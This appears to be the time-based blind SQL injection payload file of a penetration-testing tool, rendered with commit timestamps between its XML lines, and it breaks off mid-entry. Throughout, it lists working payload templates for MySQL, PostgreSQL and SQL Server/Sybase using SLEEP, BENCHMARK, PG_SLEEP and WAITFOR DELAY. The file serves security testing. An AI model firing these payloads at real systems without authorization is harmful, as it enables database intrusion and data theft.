2015-02-18 13:13:44 +03:00
<?xml version="1.0" encoding="UTF-8"?>
<root >
2015-03-19 15:09:43 +03:00
<!-- Time - based boolean tests -->
2019-05-20 13:41:41 +03:00
<!-- Prefering "query SLEEP" over "SLEEP" because of JOIN - alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
2015-02-18 13:13:44 +03:00
<test >
2019-05-20 13:41:41 +03:00
<title > MySQL > = 5.0.12 AND time-based blind (query SLEEP)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2016-05-28 00:58:42 +03:00
<level > 1</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2015-02-18 13:13:44 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
<test >
2019-05-20 13:41:41 +03:00
<title > MySQL > = 5.0.12 OR time-based blind (query SLEEP)</title>
2015-03-03 17:22:20 +03:00
<stype > 5</stype>
2016-05-28 00:58:42 +03:00
<level > 1</level>
2015-03-03 17:22:20 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2015-03-03 17:22:20 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2015-03-03 17:22:20 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-03-03 17:22:20 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2019-05-20 13:41:41 +03:00
<title > MySQL > = 5.0.12 AND time-based blind (SLEEP)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2019-05-20 13:41:41 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
2019-05-20 13:41:41 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request >
<payload > AND SLEEP([SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
<test >
2019-05-20 13:41:41 +03:00
<title > MySQL > = 5.0.12 OR time-based blind (SLEEP)</title>
2015-03-03 17:22:20 +03:00
<stype > 5</stype>
2019-05-20 13:41:41 +03:00
<level > 2</level>
2015-03-03 17:22:20 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request >
<payload > OR SLEEP([SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2015-03-19 15:09:43 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-03-03 17:22:20 +03:00
</details>
</test>
2016-07-03 03:14:23 +03:00
<test >
2019-05-20 13:41:41 +03:00
<title > MySQL > = 5.0.12 AND time-based blind (SLEEP - comment)</title>
2016-07-03 03:14:23 +03:00
<stype > 5</stype>
2019-05-20 13:41:41 +03:00
<level > 3</level>
2016-07-03 03:14:23 +03:00
<risk > 1</risk>
2019-05-20 13:41:41 +03:00
<clause > 1,2,3,9</clause>
2016-07-03 03:14:23 +03:00
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
2016-07-03 03:14:23 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > AND SLEEP([SLEEPTIME])</payload>
<comment > #</comment>
2016-07-03 03:14:23 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
<test >
2019-05-20 13:41:41 +03:00
<title > MySQL > = 5.0.12 OR time-based blind (SLEEP - comment)</title>
2016-07-03 03:14:23 +03:00
<stype > 5</stype>
2019-05-20 13:41:41 +03:00
<level > 3</level>
2016-07-03 03:14:23 +03:00
<risk > 3</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
2016-07-03 03:14:23 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > OR SLEEP([SLEEPTIME])</payload>
<comment > #</comment>
2016-07-03 03:14:23 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.0.12 AND time-based blind (query SLEEP - comment)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2016-07-03 03:14:23 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2016-07-03 03:14:23 +03:00
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.0.12 OR time-based blind (query SLEEP - comment)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2016-07-03 03:14:23 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2016-07-03 03:14:23 +03:00
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL < 5.0.12 AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 2</level>
<risk > 2</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request >
<payload > AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > < 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL < 5.0.12 OR time-based blind (heavy query)</title>
2015-03-03 17:22:20 +03:00
<stype > 5</stype>
<level > 2</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request >
<payload > OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > < 5.0.12</dbms_version>
2015-03-03 17:22:20 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL < 5.0.12 AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request >
<payload > AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
<comment > #</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > < 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2015-03-03 17:22:20 +03:00
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL < 5.0.12 OR time-based blind (heavy query - comment)</title>
2015-03-03 17:22:20 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request >
<payload > OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
<comment > #</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
2015-03-19 15:09:43 +03:00
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > < 5.0.12</dbms_version>
2015-03-19 15:09:43 +03:00
</details>
</test>
<test >
<title > MySQL > = 5.0.12 RLIKE time-based blind</title>
<stype > 5</stype>
2016-05-28 00:58:42 +03:00
<level > 2</level>
2015-03-19 15:09:43 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-19 15:09:43 +03:00
<where > 1</where>
<vector > RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request >
<payload > RLIKE SLEEP([SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.0.12 RLIKE time-based blind (comment)</title>
<stype > 5</stype>
2016-05-28 00:58:42 +03:00
<level > 4</level>
2015-03-19 15:09:43 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-19 15:09:43 +03:00
<where > 1</where>
<vector > RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
<request >
<payload > RLIKE SLEEP([SLEEPTIME])</payload>
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
2016-07-03 03:14:23 +03:00
</details>
</test>
<test >
<title > MySQL > = 5.0.12 RLIKE time-based blind (query SLEEP)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2016-07-03 03:14:23 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2016-07-03 03:14:23 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
<test >
<title > MySQL > = 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,9</clause>
<where > 1</where>
2019-05-20 13:41:41 +03:00
<vector > RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2016-07-03 03:14:23 +03:00
<request >
2019-05-20 13:41:41 +03:00
<payload > RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2016-07-03 03:14:23 +03:00
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
2015-03-19 15:09:43 +03:00
</details>
</test>
<test >
<title > MySQL AND time-based blind (ELT)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-03-19 15:09:43 +03:00
<where > 1</where>
<vector > AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request >
<payload > AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.12</dbms_version>
</details>
</test>
<test >
<title > MySQL OR time-based blind (ELT)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-19 15:09:43 +03:00
<where > 1</where>
<vector > OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request >
<payload > OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL AND time-based blind (ELT - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-19 15:09:43 +03:00
<where > 1</where>
<vector > AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request >
<payload > AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL OR time-based blind (ELT - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-19 15:09:43 +03:00
<where > 1</where>
<vector > OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request >
<payload > OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
2015-03-03 17:22:20 +03:00
<details >
<dbms > MySQL</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > PostgreSQL > 8.1 AND time-based blind</title>
<stype > 5</stype>
<level > 1</level>
<risk > 1</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
2015-03-03 17:22:20 +03:00
<test >
<title > PostgreSQL > 8.1 OR time-based blind</title>
<stype > 5</stype>
<level > 1</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-03-03 17:22:20 +03:00
<where > 1</where>
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > PostgreSQL > 8.1 AND time-based blind (comment)</title>
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 4</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > PostgreSQL > 8.1 OR time-based blind (comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 4</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [SLEEPTIME]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
2015-03-03 17:22:20 +03:00
<dbms_version > > 8.1</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > PostgreSQL AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 2</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > PostgreSQL OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 2</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
2015-03-03 17:22:20 +03:00
<time > [DELAYED]</time>
2015-02-18 13:13:44 +03:00
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > PostgreSQL</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > PostgreSQL AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > PostgreSQL</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > PostgreSQL OR time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
2015-03-03 17:22:20 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > PostgreSQL</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-09-29 13:59:51 +03:00
<title > Microsoft SQL Server/Sybase time-based blind (IF)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 1</level>
<risk > 1</risk>
2015-03-03 17:22:20 +03:00
<clause > 0</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2016-09-29 13:59:51 +03:00
<title > Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 4</level>
2015-02-18 13:13:44 +03:00
<risk > 1</risk>
2015-03-03 17:22:20 +03:00
<clause > 0</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 2</level>
<risk > 2</risk>
2018-09-06 00:29:52 +03:00
<clause > 1,2,3,8,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 2</level>
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
2015-03-03 17:22:20 +03:00
<level > 5</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-03-03 17:22:20 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
<comment > --</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2015-03-03 17:22:20 +03:00
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2015-03-03 17:22:20 +03:00
<title > Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 5</level>
2015-03-03 17:22:20 +03:00
<risk > 3</risk>
2016-04-08 14:19:42 +03:00
<clause > 1,2,3,9</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-03-03 17:22:20 +03:00
